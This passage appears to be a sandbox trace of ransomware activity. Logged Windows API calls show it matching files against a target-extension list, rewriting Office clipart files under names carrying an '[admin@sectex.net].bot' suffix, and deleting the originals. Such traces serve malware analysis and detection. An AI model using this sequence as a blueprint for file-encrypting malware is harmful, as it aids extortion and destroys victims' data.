	[0168.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152600.WMF") returned 63
	[0168.653] lstrlenW (lpString=".1cd") returned 4
	[0168.653] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0168.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152600.WMF") returned 63
	[0168.653] lstrlenW (lpString=".jpg") returned 4
	[0168.653] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0168.653] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0168.653] lstrlenW (lpString="J0152608.WMF") returned 12
	[0168.654] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152608.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152608.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0168.654] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=12436) returned 1
	[0168.654] CloseHandle (hObject=0x1b4) returned 1
	[0168.654] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152608.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152608.wmf")) returned 0x20
	[0168.654] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152608.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152608.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0168.654] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152608.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152608.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0168.655] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.655] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.655] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152608.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152608.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0168.655] GetLastError () returned 0x0
	[0168.655] ReadFile (in: hFile=0x1b4, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x3094, lpOverlapped=0x0) returned 1
	[0168.671] WriteFile (in: hFile=0x3c4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x30a0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x30a0, lpOverlapped=0x0) returned 1
	[0168.672] ReadFile (in: hFile=0x1b4, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0168.672] WriteFile (in: hFile=0x3c4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0168.672] SetEndOfFile (hFile=0x3c4) returned 1
	[0168.672] CloseHandle (hObject=0x3c4) returned 1
	[0168.673] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.673] SetEndOfFile (hFile=0x1b4) returned 1
	[0168.675] CloseHandle (hObject=0x1b4) returned 1
	[0168.675] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152608.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0168.675] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152608.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152608.wmf")) returned 1
	[0168.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152608.WMF") returned 63
	[0168.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152608.WMF") returned 63
	[0168.678] lstrlenW (lpString=".doc") returned 4
	[0168.678] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0168.678] lstrlenW (lpString=".docx") returned 5
	[0168.678] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0168.678] lstrlenW (lpString=".pdf") returned 4
	[0168.678] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0168.678] lstrlenW (lpString=".xls") returned 4
	[0168.678] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0168.678] lstrlenW (lpString=".xlsx") returned 5
	[0168.678] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0168.678] lstrlenW (lpString=".ppt") returned 4
	[0168.678] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0168.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152608.WMF") returned 63
	[0168.678] lstrlenW (lpString=".zip") returned 4
	[0168.678] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0168.678] lstrlenW (lpString=".rar") returned 4
	[0168.678] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0168.678] lstrlenW (lpString=".bz2") returned 4
	[0168.678] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0168.678] lstrlenW (lpString=".7z") returned 3
	[0168.678] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0168.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152608.WMF") returned 63
	[0168.678] lstrlenW (lpString=".dbf") returned 4
	[0168.678] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0168.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152608.WMF") returned 63
	[0168.679] lstrlenW (lpString=".1cd") returned 4
	[0168.679] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0168.679] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152608.WMF") returned 63
	[0168.679] lstrlenW (lpString=".jpg") returned 4
	[0168.679] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0168.679] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152608.WMF") returned 63
	[0168.679] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152608.WMF") returned 63
	[0168.679] lstrlenW (lpString=".doc") returned 4
	[0168.679] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0168.679] lstrlenW (lpString=".docx") returned 5
	[0168.679] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0168.679] lstrlenW (lpString=".pdf") returned 4
	[0168.679] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0168.679] lstrlenW (lpString=".xls") returned 4
	[0168.679] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0168.679] lstrlenW (lpString=".xlsx") returned 5
	[0168.679] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0168.679] lstrlenW (lpString=".ppt") returned 4
	[0168.679] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0168.679] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152608.WMF") returned 63
	[0168.679] lstrlenW (lpString=".zip") returned 4
	[0168.679] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0168.679] lstrlenW (lpString=".rar") returned 4
	[0168.679] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0168.679] lstrlenW (lpString=".bz2") returned 4
	[0168.679] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0168.679] lstrlenW (lpString=".7z") returned 3
	[0168.679] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0168.679] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152608.WMF") returned 63
	[0168.679] lstrlenW (lpString=".dbf") returned 4
	[0168.679] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0168.679] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152608.WMF") returned 63
	[0168.679] lstrlenW (lpString=".1cd") returned 4
	[0168.679] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0168.679] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152608.WMF") returned 63
	[0168.680] lstrlenW (lpString=".jpg") returned 4
	[0168.680] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0168.680] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0168.680] lstrlenW (lpString="J0152622.WMF") returned 12
	[0168.680] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152622.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152622.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0168.705] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=9604) returned 1
	[0168.705] CloseHandle (hObject=0x3a8) returned 1
	[0168.705] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152622.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152622.wmf")) returned 0x20
	[0168.727] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152622.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152622.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0168.727] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152622.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152622.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0168.727] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.727] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.727] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152622.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152622.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0168.728] GetLastError () returned 0x0
	[0168.728] ReadFile (in: hFile=0x3e8, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x2584, lpOverlapped=0x0) returned 1
	[0169.006] WriteFile (in: hFile=0x3d0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x2590, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x2590, lpOverlapped=0x0) returned 1
	[0169.007] ReadFile (in: hFile=0x3e8, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.007] WriteFile (in: hFile=0x3d0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.007] SetEndOfFile (hFile=0x3d0) returned 1
	[0169.007] CloseHandle (hObject=0x3d0) returned 1
	[0169.007] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.007] SetEndOfFile (hFile=0x3e8) returned 1
	[0169.011] CloseHandle (hObject=0x3e8) returned 1
	[0169.011] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152622.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.011] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152622.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152622.wmf")) returned 1
	[0169.012] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152622.WMF") returned 63
	[0169.012] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152622.WMF") returned 63
	[0169.012] lstrlenW (lpString=".doc") returned 4
	[0169.012] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.012] lstrlenW (lpString=".docx") returned 5
	[0169.012] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0169.012] lstrlenW (lpString=".pdf") returned 4
	[0169.012] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.012] lstrlenW (lpString=".xls") returned 4
	[0169.012] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.012] lstrlenW (lpString=".xlsx") returned 5
	[0169.012] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0169.012] lstrlenW (lpString=".ppt") returned 4
	[0169.012] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.012] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152622.WMF") returned 63
	[0169.012] lstrlenW (lpString=".zip") returned 4
	[0169.012] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.012] lstrlenW (lpString=".rar") returned 4
	[0169.012] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.012] lstrlenW (lpString=".bz2") returned 4
	[0169.012] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.012] lstrlenW (lpString=".7z") returned 3
	[0169.012] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.012] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152622.WMF") returned 63
	[0169.012] lstrlenW (lpString=".dbf") returned 4
	[0169.012] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.012] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152622.WMF") returned 63
	[0169.012] lstrlenW (lpString=".1cd") returned 4
	[0169.012] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.013] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152622.WMF") returned 63
	[0169.013] lstrlenW (lpString=".jpg") returned 4
	[0169.013] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.013] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152622.WMF") returned 63
	[0169.013] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152622.WMF") returned 63
	[0169.013] lstrlenW (lpString=".doc") returned 4
	[0169.013] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.013] lstrlenW (lpString=".docx") returned 5
	[0169.013] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0169.013] lstrlenW (lpString=".pdf") returned 4
	[0169.013] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.013] lstrlenW (lpString=".xls") returned 4
	[0169.013] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.013] lstrlenW (lpString=".xlsx") returned 5
	[0169.013] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0169.013] lstrlenW (lpString=".ppt") returned 4
	[0169.013] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.013] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152622.WMF") returned 63
	[0169.013] lstrlenW (lpString=".zip") returned 4
	[0169.013] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.013] lstrlenW (lpString=".rar") returned 4
	[0169.013] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.013] lstrlenW (lpString=".bz2") returned 4
	[0169.013] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.013] lstrlenW (lpString=".7z") returned 3
	[0169.013] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.013] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152622.WMF") returned 63
	[0169.013] lstrlenW (lpString=".dbf") returned 4
	[0169.013] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.013] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152622.WMF") returned 63
	[0169.013] lstrlenW (lpString=".1cd") returned 4
	[0169.013] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.013] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152622.WMF") returned 63
	[0169.014] lstrlenW (lpString=".jpg") returned 4
	[0169.014] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.014] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0169.014] lstrlenW (lpString="J0152694.WMF") returned 12
	[0169.014] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152694.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152694.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0169.014] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=1348) returned 1
	[0169.014] CloseHandle (hObject=0x3e8) returned 1
	[0169.014] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152694.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152694.wmf")) returned 0x20
	[0169.015] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152694.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152694.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.015] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152694.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152694.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0169.015] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.015] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.015] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152694.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152694.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0169.016] GetLastError () returned 0x0
	[0169.016] ReadFile (in: hFile=0x3e8, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x544, lpOverlapped=0x0) returned 1
	[0169.077] WriteFile (in: hFile=0x3d0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x550, lpOverlapped=0x0) returned 1
	[0169.084] ReadFile (in: hFile=0x3e8, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.084] WriteFile (in: hFile=0x3d0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.085] SetEndOfFile (hFile=0x3d0) returned 1
	[0169.085] CloseHandle (hObject=0x3d0) returned 1
	[0169.085] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.085] SetEndOfFile (hFile=0x3e8) returned 1
	[0169.087] CloseHandle (hObject=0x3e8) returned 1
	[0169.087] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152694.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.097] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152694.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152694.wmf")) returned 1
	[0169.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152694.WMF") returned 63
	[0169.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152694.WMF") returned 63
	[0169.098] lstrlenW (lpString=".doc") returned 4
	[0169.098] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.098] lstrlenW (lpString=".docx") returned 5
	[0169.098] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0169.098] lstrlenW (lpString=".pdf") returned 4
	[0169.098] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.098] lstrlenW (lpString=".xls") returned 4
	[0169.098] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.098] lstrlenW (lpString=".xlsx") returned 5
	[0169.098] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0169.098] lstrlenW (lpString=".ppt") returned 4
	[0169.098] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152694.WMF") returned 63
	[0169.098] lstrlenW (lpString=".zip") returned 4
	[0169.098] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.098] lstrlenW (lpString=".rar") returned 4
	[0169.098] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.098] lstrlenW (lpString=".bz2") returned 4
	[0169.098] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.098] lstrlenW (lpString=".7z") returned 3
	[0169.098] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152694.WMF") returned 63
	[0169.098] lstrlenW (lpString=".dbf") returned 4
	[0169.098] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152694.WMF") returned 63
	[0169.098] lstrlenW (lpString=".1cd") returned 4
	[0169.098] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152694.WMF") returned 63
	[0169.098] lstrlenW (lpString=".jpg") returned 4
	[0169.098] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152694.WMF") returned 63
	[0169.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152694.WMF") returned 63
	[0169.099] lstrlenW (lpString=".doc") returned 4
	[0169.099] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.099] lstrlenW (lpString=".docx") returned 5
	[0169.099] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0169.099] lstrlenW (lpString=".pdf") returned 4
	[0169.099] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.099] lstrlenW (lpString=".xls") returned 4
	[0169.099] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.099] lstrlenW (lpString=".xlsx") returned 5
	[0169.099] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0169.099] lstrlenW (lpString=".ppt") returned 4
	[0169.099] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152694.WMF") returned 63
	[0169.099] lstrlenW (lpString=".zip") returned 4
	[0169.099] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.099] lstrlenW (lpString=".rar") returned 4
	[0169.099] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.099] lstrlenW (lpString=".bz2") returned 4
	[0169.099] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.099] lstrlenW (lpString=".7z") returned 3
	[0169.099] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152694.WMF") returned 63
	[0169.099] lstrlenW (lpString=".dbf") returned 4
	[0169.099] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152694.WMF") returned 63
	[0169.099] lstrlenW (lpString=".1cd") returned 4
	[0169.099] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152694.WMF") returned 63
	[0169.099] lstrlenW (lpString=".jpg") returned 4
